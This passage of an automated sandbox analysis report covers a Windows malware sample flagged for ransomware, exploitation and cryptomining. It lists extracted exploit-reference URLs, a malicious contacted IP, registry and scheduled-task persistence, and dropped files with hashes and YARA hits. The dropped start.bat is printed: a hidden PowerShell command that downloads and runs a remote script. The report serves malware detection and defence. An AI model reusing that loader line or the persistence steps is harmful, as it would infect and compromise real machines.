                      http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIwscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                        		high
                        https://github.com/harris2015)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                          		high
                          http://print1n.top)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://hub.docker.com/r/petergrace/opentsdb-dockername:scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                            		high
                            https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%scan.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c7scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                              		high
                              https://www.zhihuifly.com/t/topic/3118scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.hackbug.net/archives/111.htmlscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/vulhub/vulhub/tree/masterscan.exefalse
                                		high
                                https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                  		high
                                  https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488978&idx=1&sn=c0a5369f2b374dcef0bbf61b92scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                    		high
                                    http://www.xdoa.cnscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rcescan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                      		high
                                      http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%Bscan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/MrPointSun)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                        		high
                                        https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.shscan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                          		high
                                          http://127.0.0.1:8080inscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://github.com/neverendxxxxxx)scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                            		high
                                            https://blog.csdn.net/qq_36374896/article/details/84839891scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                              		high
                                              https://s.tencent.com/research/bsafe/1228.htmlscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                		high
                                                https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dscan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/hanxiansheng26)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                  		high
                                                  http://cve-2018-7600-8-x.vulnet:8080/scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://api.ceye.io/v1/records?token=%s&type=dns&filter=%sonlyscan.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.jianshu.com/p/8d878330a42fscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                    		high
                                                    http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL%E6%B3%A8%E5%85%scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rejetto.com/hfs/)177635683940025046467781066894531252006-01-02scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                      		high
                                                      https://github.com/bufsnake)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                        		high
                                                        https://www.freebuf.com/column/214946.htmlname:scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                          		high
                                                          https://github.com/j4ckzh0u)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                            		high
                                                            http://jellyfin.orgscan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://%s.%sillegalscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low
                                                            https://github.com/neverendxxxxscan.exefalse
                                                              		high
                                                              https://phyb0x.github.io/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/namscan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://phyb0x.github.scan.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://webkiller.cn/)scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8Ascan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                		high
                                                                http://127.0.0.1:8080sql:scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		low
                                                                https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533name:scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                  		high
                                                                  https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                    		high
                                                                    https://nvd.nist.gov/vuln/detail/CVE-2022-26134scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                      		high
                                                                      https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841name:scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                        		high
                                                                        https://github.com/shmilylty)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                          		high
                                                                          https://xz.aliyun.com/t/2224scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                            		high
                                                                            https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://wx.weaver)(scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		low
                                                                            https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabiliscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                              		high
                                                                              https://github.com/B1anda0)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                		high
                                                                                https://mp.weixin.qq.com/s/taEEl6UQ2yi4cqzs2UBfCgscan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                  		high
                                                                                  https://paper.seebug.org/567/scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                    		high
                                                                                    https://print1n.top)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		low
                                                                                    https://blog.csdn.net/xuandao_ahfengren/article/details/111402955scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                      		high
                                                                                      https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.cnblogs.com/test404/p/7397755.htmlname:scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                        		high
                                                                                        https://hackfun.org/)scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://shells.systems/pandorafms-v7-0ng-ascan.exefalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996scan.exefalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.bt.cn/bbs)(Kubernetesscan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                          		high
                                                                                          https://print1n.top/post/Other/TamronOS_IPTV%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E5%89%8D%E5%8F%B0%Escan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://0day5.com/archives/4249/scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                            		high
                                                                                            https://github.com/vulhub/vulhub/tree/mastescan.exefalse
                                                                                              		high
                                                                                              https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARwscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                                		high
                                                                                                https://nvd.nist.gov/vuln/detail/CVE-2020-7980scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                                  		high
                                                                                                  https://github.com/NS-Sp4ce/Inspurscan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                                    		high
                                                                                                    http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://github.com/LandGrey/flink-unauth-rcescan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                                      		high
                                                                                                      http://127.0.0.1:id:scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      https://www.anquanke.com/post/id/187923scan.exe, scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                                        		high
                                                                                                        https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.mdname:scan.exe, 00000037.00000002.494249420.0000000000F21000.00000040.00000001.01000000.0000000A.sdmpfalse
                                                                                                          		high

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          212.87.212.218
                                                                                                          		unknownGermany
                                                                                                          		395800GBTCLOUDUStrue

                                                                                                          Private

                                                                                                          IP
                                                                                                          192.168.2.148
                                                                                                          192.168.2.149
                                                                                                          192.168.2.146
                                                                                                          192.168.2.147
                                                                                                          192.168.2.140
                                                                                                          192.168.2.141
                                                                                                          192.168.2.144
                                                                                                          192.168.2.145
                                                                                                          192.168.2.142
                                                                                                          192.168.2.143
                                                                                                          192.168.2.159
                                                                                                          192.168.2.157
                                                                                                          192.168.2.158
                                                                                                          192.168.2.151
                                                                                                          192.168.2.152
                                                                                                          192.168.2.150
                                                                                                          192.168.2.155
                                                                                                          192.168.2.156
                                                                                                          192.168.2.153
                                                                                                          192.168.2.154
                                                                                                          192.168.2.126
                                                                                                          192.168.2.247
                                                                                                          192.168.2.127
                                                                                                          192.168.2.248
                                                                                                          192.168.2.124
                                                                                                          192.168.2.245
                                                                                                          192.168.2.125
                                                                                                          192.168.2.246
                                                                                                          192.168.2.128
                                                                                                          192.168.2.249
                                                                                                          192.168.2.129
                                                                                                          192.168.2.240
                                                                                                          192.168.2.122
                                                                                                          192.168.2.243
                                                                                                          192.168.2.123
                                                                                                          192.168.2.244
                                                                                                          192.168.2.120
                                                                                                          192.168.2.241
                                                                                                          192.168.2.121
                                                                                                          192.168.2.242
                                                                                                          192.168.2.97
                                                                                                          192.168.2.137
                                                                                                          192.168.2.96
                                                                                                          192.168.2.138
                                                                                                          192.168.2.99
                                                                                                          192.168.2.135
                                                                                                          192.168.2.98
                                                                                                          192.168.2.136
                                                                                                          192.168.2.139
                                                                                                          192.168.2.250
                                                                                                          192.168.2.130
                                                                                                          192.168.2.251
                                                                                                          192.168.2.91
                                                                                                          192.168.2.90
                                                                                                          192.168.2.93
                                                                                                          192.168.2.133
                                                                                                          192.168.2.254
                                                                                                          192.168.2.92
                                                                                                          192.168.2.134
                                                                                                          192.168.2.255
                                                                                                          192.168.2.95
                                                                                                          192.168.2.131
                                                                                                          192.168.2.252
                                                                                                          192.168.2.94
                                                                                                          192.168.2.132
                                                                                                          192.168.2.253
                                                                                                          192.168.2.104
                                                                                                          192.168.2.225
                                                                                                          192.168.2.105
                                                                                                          192.168.2.226
                                                                                                          192.168.2.102
                                                                                                          192.168.2.223
                                                                                                          192.168.2.103
                                                                                                          192.168.2.224
                                                                                                          192.168.2.108
                                                                                                          192.168.2.229
                                                                                                          192.168.2.109
                                                                                                          192.168.2.106
                                                                                                          192.168.2.227
                                                                                                          192.168.2.107
                                                                                                          192.168.2.228
                                                                                                          192.168.2.100
                                                                                                          192.168.2.221
                                                                                                          192.168.2.101
                                                                                                          192.168.2.222
                                                                                                          192.168.2.220
                                                                                                          192.168.2.115
                                                                                                          192.168.2.236
                                                                                                          192.168.2.116
                                                                                                          192.168.2.237
                                                                                                          192.168.2.113
                                                                                                          192.168.2.234
                                                                                                          192.168.2.114
                                                                                                          192.168.2.235
                                                                                                          192.168.2.119
                                                                                                          192.168.2.117
                                                                                                          192.168.2.238
                                                                                                          192.168.2.118
                                                                                                          192.168.2.239

                                                                                                          General Information

                                                                                                          Joe Sandbox Version:35.0.0 Citrine
                                                                                                          Analysis ID:683425
                                                                                                          Start date and time:2022-08-13 09:05:24 +02:00
                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                          Overall analysis duration:0h 14m 36s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Sample file name:jxatBamQnK (renamed file extension from none to exe)
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                          Number of analysed new started processes analysed:137
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • HDC enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.rans.expl.evad.mine.winEXE@168/32@0/100
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 20%
                                                                                                          HDC Information:
                                                                                                          • Successful, ratio: 99.7% (good quality ratio 82.9%)
                                                                                                          • Quality average: 61.8%
                                                                                                          • Quality standard deviation: 35.2%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 90%
                                                                                                          • Number of executed functions: 47
                                                                                                          • Number of non-executed functions: 141
                                                                                                          Cookbook Comments:
                                                                                                          • Adjust boot time
                                                                                                          • Enable AMSI

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 93.184.221.240
                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, login.live.com, pool.supportxmr.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com
                                                                                                          • Execution Graph export aborted for target daemon.exe, PID 4404 because there are no executed function
                                                                                                          • Execution Graph export aborted for target daemon.exe, PID 6052 because there are no executed function
                                                                                                          • Execution Graph export aborted for target daemon.exe, PID 7048 because there are no executed function
                                                                                                          • Execution Graph export aborted for target scan.exe, PID 2828 because there are no executed function
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          09:06:43AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start.bat
                                                                                                          09:06:47Task SchedulerRun new task: MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 path: powershell.exe s>-nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\"http://212.87.212.218/doanlowd.txt\")
                                                                                                          09:06:57API Interceptor60x Sleep call for process: powershell.exe modified
                                                                                                          09:06:57API Interceptor4x Sleep call for process: WMIC.exe modified
                                                                                                          09:06:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run registryKeyName C:\Windows\Temp\daemon.exe
                                                                                                          09:07:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run registryKeyName C:\Windows\Temp\daemon.exe
                                                                                                          09:07:15AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run registryKeyName C:\Windows\Temp\daemon.exe

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          No context

                                                                                                          Domains

                                                                                                          No context

                                                                                                          ASNs

                                                                                                          No context

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.bat

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\jxatBamQnK.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):134
                                                                                                          Entropy (8bit):4.890433730651066
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:VSJJLNyLqPA6j/WCRV4qvtmAcLhzAK5Dm9pakXUIBfP97F:snyLmDeCHn8zD5CnXUIx97F
                                                                                                          MD5:77B87E33D61801FDAC6B78340A2C14C2
                                                                                                          SHA1:96A4E8E0804201653D7D3304AEED9EED64DABD1F
                                                                                                          SHA-256:BB3DBEE86B2F89BA03F9A46327BA3792775D1D008F29A5F70D4CA445BB9EC633
                                                                                                          SHA-512:2D40FC4E6EDCA6255426954D42CB360D4A88CCD936028920645FDC09A95AE429758D8732027919E3DF0BAA3B9042258B336220AF71BE25235C6120BBFDFF1815
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.bat, Author: Florian Roth
                                                                                                          • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.bat, Author: Joe Security
                                                                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.bat, Author: Florian Roth
                                                                                                          • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\start.bat, Author: Joe Security
                                                                                                          Reputation:unknown
                                                                                                          Preview:powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString('http://212.87.212.218/doanlowd.txt')

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11606
                                                                                                          Entropy (8bit):4.883977562702998
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                                                                                                          MD5:243581397F734487BD471C04FB57EA44
                                                                                                          SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                                                                                                          SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                                                                                                          SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):0.9260988789684415
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                          MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                          SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                          SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                          SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:@...e................................................@..........

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bd53dv0j.0tx.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eh05jeng.cll.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kgvtinbj.1qf.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:very short file (no magic)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1
                                                                                                          Entropy (8bit):0.0
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:U:U
                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:1

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xez11ukq.rjb.ps1

